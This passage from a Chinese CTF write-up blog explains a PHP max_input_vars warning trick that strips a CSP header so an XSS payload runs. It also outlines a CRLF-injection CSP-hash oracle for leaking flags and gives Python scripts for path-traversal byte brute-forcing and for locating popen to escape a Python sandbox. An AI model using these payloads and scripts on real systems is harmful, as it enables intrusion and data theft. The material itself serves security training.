<span class="comment">1000...</span></span><br><span class="line"></span><br><span class="line">组合攻击： 攻击者现在构造一个恶意 URL，这个 URL 同时包含<span class="comment"> XSS</span> 负载和超过<span class="comment"> 1000</span> 个的“垃圾”参数。</span><br><span class="line"></span><br><span class="line">正常 URL <span class="comment">(</span>被<span class="comment"> CSP</span> 拦截<span class="comment">): https:</span>//<span class="comment">example.com</span>/page.php?xss=&lt;svg/<span class="comment">onload=alert(1)&gt;</span></span><br><span class="line"></span><br><span class="line">响应: HTTP/<span class="number">1.1</span> <span class="number">200</span> OK Content-Security-Policy: default-src <span class="comment">'self'</span> ... &lt;svg/onload=alert(1)&gt; (不执行)</span><br><span class="line"></span><br><span class="line">恶意 URL <span class="comment">(</span>绕过<span class="comment"> CSP): https:</span>//<span class="comment">example.com</span>/page.php?xss=&lt;svg/<span class="comment">onload=alert(1)&gt;&amp;a=1&amp;a=2&amp;a=3&amp;...&amp;a=1001</span></span><br><span class="line"></span><br><span class="line">服务器处理流程:</span><br><span class="line"></span><br><span class="line">PHP 开始处理请求。</span><br><span class="line"></span><br><span class="line">PHP 发现有<span class="comment"> 1002</span> 个（<span class="comment">xss + 1001</span> 个<span class="comment"> a</span>）输入变量，超过了<span class="comment"> 1000</span> 的限制。</span><br><span class="line"></span><br><span class="line">PHP 立即向响应体输出警告：<span class="comment">&lt;b&gt;Warning&lt;</span>/b&gt;: Input variables exceeded...</span><br><span class="line"></span><br><span class="line">page.php 脚本继续执行，它尝试设置 CSP：header(<span class="comment">"Content-Security-Policy: ..."</span>)。</span><br><span class="line"></span><br><span class="line">因为前面已经有了输出（那个 Warning），header() 函数调用失败。</span><br><span class="line"></span><br><span class="line">脚本继续执行，最后输出 XSS 负载：echo $_GET[<span class="comment">'xss'</span>];</span><br><span class="line"></span><br><span class="line">最终响应 (发送给浏览器): HTTP/<span class="comment">1.1 200 OK (</span>没有<span class="comment"> CSP</span> 标头<span class="comment">!) ... &lt;b&gt;Warning&lt;</span>/b&gt;: Input variables exceeded... &lt;svg/<span class="comment">onload=alert(1)&gt; (</span>成功执行<span class="comment">!)</span></span><br><span class="line"></span><br><span class="line">总结</span><br><span class="line">这个技巧的精髓在于：利用 max_input_vars 这个用于防范<span class="comment"> DoS</span> 的安全特性，使其产生一个“有副作用”的警告输出，这个输出破坏了<span class="comment"> CSP</span> 标头设置的前提条件，最终导致<span class="comment"> CSP</span> 策略被完全移除，从而使<span class="comment"> XSS</span> 攻击得以成功。</span><br><span class="line"></span><br><span class="line">这在 CTF 挑战和现实世界的漏洞挖掘中都是一个非常高级和巧妙的技巧。</span><br></pre></td></tr></table></figure>

<h2 id="Devil-Net-v2"><a href="#Devil-Net-v2" class="headerlink" title="Devil Net v2"></a>Devil Net v2</h2><figure class="highlight mathematica"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">这个解法比我之前提到的“Header 重定向”要高级得多，也更符合高质量 CTF 题目的考点。这是一种基于 CSP（内容安全策略）Oracle 和 HTTP 响应截断 的 XS-Leak（跨站泄露）攻击。</span><br><span class="line"></span><br><span class="line">核心原理总结</span><br><span class="line">这个脚本利用了 CRLF 注入漏洞做了三件事，组合起来实现逐字节爆破 Flag：</span><br><span class="line"></span><br><span class="line">上下文篡改 (<span class="keyword">Context</span> Confusion)：通过注入 &lt;style&gt; 标签，强行让浏览器把原本是 HTML 的页面内容解析为 CSS 样式表。</span><br><span class="line"></span><br><span class="line">响应截断 (Response Truncation)：通过注入恶意的 Content-<span class="keyword">Length</span> 头，控制浏览器只读取页面的一小部分（刚好读到我们猜测的 Flag 字符位置）。</span><br><span class="line"></span><br><span class="line">CSP 哈希预言机 (CSP <span class="keyword">Hash</span> Oracle)：利用 Content-Security-Policy-Report-Only 头，告诉浏览器：“如果这段 CSS 内容的哈希值不是我算出来的这个，就发个报错报告给我”。</span><br></pre></td></tr></table></figure>

<h2 id="Backup"><a href="#Backup" class="headerlink" title="Backup"></a>Backup</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line"></span><br><span class="line">host = <span class="string">"192.168.31.34"</span></span><br><span class="line">port = <span class="number">3002</span></span><br><span class="line">data = &#123;<span class="string">"ixxp"</span>: <span class="string">"192.168.31.34"</span>&#125;</span><br><span class="line">body = json.dumps(data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> byte <span class="keyword">in</span> range(<span class="number">256</span>):</span><br><span class="line">    request = (</span><br><span class="line">        <span class="string">b"POST /ping%2f.."</span>+ bytes([byte]) + <span class="string">b"/debug"</span> + <span class="string">b" HTTP/1.1\r\n"</span></span><br><span class="line">        <span class="string">b"Host: "</span> + host.encode() + <span class="string">b"\r\n"</span></span><br><span class="line">        <span class="string">b"Content-Type: application/json\r\n"</span></span><br><span class="line">        <span class="string">b"Content-Length: "</span> + str(len(body)).encode() + <span class="string">b"\r\n"</span></span><br><span class="line">        <span class="string">b"Connection: close\r\n"</span></span><br><span class="line">        <span class="string">b"\r\n"</span> + body.encode()</span><br><span class="line">    )</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">with</span> socket.socket(socket.AF_INET, socket.SOCK_STREAM) <span class="keyword">as</span> s:</span><br><span class="line">        s.connect((host, port))</span><br><span class="line">        s.sendall(request)</span><br><span class="line">        response = s.recv(<span class="number">4096</span>).decode()</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"address"</span> <span class="keyword">in</span> response:</span><br><span class="line">            print(response)</span><br><span class="line">            print(<span class="string">f"Bypass found with byte \\x<span class="subst">&#123;byte:<span class="number">02</span>x&#125;</span>"</span>)</span><br></pre></td></tr></table></figure>

 <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> datetime</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> traceback</span><br><span class="line"><span class="keyword">import</span> inspect</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">obj_walker</span><span class="params">(obj,searcher,filter,depth=<span class="number">10</span>)</span>:</span></span><br><span class="line">    visited = set()</span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">backtrace</span><span class="params">()</span>:</span></span><br><span class="line">        stack = inspect.stack()</span><br><span class="line">        path = []</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> stack:</span><br><span class="line">            <span class="keyword">if</span>(i.function == <span class="string">"dfs"</span>):</span><br><span class="line">                <span class="keyword">try</span>:</span><br><span class="line">                    path.append(i.frame.f_locals[<span class="string">'name'</span>])</span><br><span class="line">                <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">                    <span class="keyword">raise</span> e</span><br><span class="line">        print(<span class="string">'.'</span>.join(path[::<span class="number">-1</span>]))</span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">dfs</span><span class="params">(current,d,name,visited)</span>:</span></span><br><span class="line">        visited = set(visited)</span><br><span class="line">        <span class="keyword">if</span> filter(name):</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line">        <span class="keyword">if</span> searcher(current):</span><br><span class="line">            backtrace()</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line">        <span class="keyword">if</span> id(current) <span class="keyword">in</span> visited:</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line">        <span class="keyword">if</span> d &gt; depth:</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line">        </span><br><span class="line">        visited.add(id(current))</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> dir(current):</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                next = getattr(current,i)</span><br><span class="line">                dfs(next,d+<span class="number">1</span>,i,visited)</span><br><span class="line">            <span class="keyword">except</span> AttributeError <span class="keyword">as</span> e:</span><br><span class="line">                <span class="keyword">pass</span></span><br><span class="line">        <span class="keyword">if</span> isinstance(current, dict):</span><br><span class="line">            <span class="keyword">for</span> k,v <span class="keyword">in</span> current.items():</span><br><span class="line">                dfs(k,d+<span class="number">1</span>,<span class="string">f'[<span class="subst">&#123;k&#125;</span>]'</span>,visited)</span><br><span class="line">                dfs(v,d+<span class="number">1</span>,<span class="string">f'[<span class="subst">&#123;k&#125;</span>]'</span>,visited)</span><br><span class="line">        <span class="keyword">if</span> isinstance(current, list):</span><br><span class="line">            i = <span class="number">0</span></span><br><span class="line">            <span class="keyword">for</span> next <span class="keyword">in</span> current:</span><br><span class="line">                i += <span class="number">1</span></span><br><span class="line">                dfs(next,d+<span class="number">1</span>,<span class="string">f'[<span class="subst">&#123;i&#125;</span>]'</span>,visited)</span><br><span class="line">    dfs(obj,<span class="number">0</span>,<span class="string">''</span>,visited)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">searcher</span><span class="params">(i)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> hasattr(i,<span class="string">'__name__'</span>) <span class="keyword">and</span> i.__name__ == <span class="string">'popen'</span>:</span><br><span class="line">        print(i)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">filter</span><span class="params">(name)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">'__'</span> <span class="keyword">in</span> name:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">obj_walker(sys.modules,searcher,filter,<span class="number">4</span>)</span><br></pre></td></tr></table></figure>
  </div>
</article>



      </div>
      
       <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#QnQSec-CTF-2025-web-FaaS"><span class="toc-number">1.</span> <span class="toc-text">QnQSec CTF 2025 web FaaS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#QnQSec-CTF-2025-web-Date-Logger"><span class="toc-number">2.</span> <span class="toc-text">QnQSec CTF 2025 web  Date-Logger</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#N1CTF-2025-eezzjs"><span class="toc-number">3.</span> <span class="toc-text">N1CTF 2025 eezzjs</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#AmateursCTF-2025-web-desafe"><span class="toc-number">4.</span> <span class="toc-text">AmateursCTF 2025 web/desafe</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PwnSec-CTF-2025-A-Very-Safe-Locker-Indeed"><span class="toc-number">5.</span> <span class="toc-text">PwnSec CTF 2025 | A Very Safe Locker Indeed</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PwnSec-CTF-2025-OhMyPP"><span class="toc-number">6.</span> <span class="toc-text">PwnSec CTF 2025 | OhMyPP</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PwnSec-CTF-2025-FireLeak"><span class="toc-number">7.</span> <span class="toc-text">PwnSec CTF 2025 | FireLeak</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PwnSec-CTF-2025-PSPD"><span class="toc-number">8.</span> <span class="toc-text">PwnSec CTF 2025 | PSPD</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PwnSec-CTF-2025-MaxPayne"><span class="toc-number">9.</span> <span class="toc-text">PwnSec CTF 2025 | MaxPayne</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Devil-Net-v2"><span class="toc-number">10.</span> <span class="toc-text">Devil Net v2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Backup"><span class="toc-number">11.</span> <span class="toc-text">Backup</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2025/10/18/QnQSecctf2025/"><i class="fa fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&text=Some CTF"><i class="fa fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&title=Some CTF"><i class="fa fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&is_video=false&description=Some CTF"><i class="fa fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Some CTF&body=Check out this article: http://yoursite.com/2025/10/18/QnQSecctf2025/"><i class="fa fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&title=Some CTF"><i class="fa fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&title=Some CTF"><i class="fa fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&title=Some CTF"><i class="fa fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&title=Some CTF"><i class="fa fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2025/10/18/QnQSecctf2025/&name=Some CTF&description="><i class="fa fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
      <ul>
        <li id="toc"><a class="icon" href="#" onclick='$("#toc-footer").toggle();return false;'><i class="fa fa-list fa-lg" aria-hidden="true"></i> TOC</a></li>
        <!-- <li id="share"><a class="icon" href="#" onclick='$("#share-footer").toggle();return false;'><i class="fa fa-share-alt fa-lg" aria-hidden="true"></i> Share</a></li> -->
        <li id="top" style="display:none"><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a></li>
        <li id="menu"><a class="icon" href="#" onclick='$("#nav-footer").toggle();return false;'><i class="fa fa-bars fa-lg" aria-hidden="true"></i> Menu</a></li>
      </ul>
    </div>

  </div>
</div>

      
      <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2025 Deen&#39;s blog
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

      <script src="/lib/justified-gallery/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- Google Analytics -->

<!-- Disqus Comments -->


    </div><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</body>
</html>
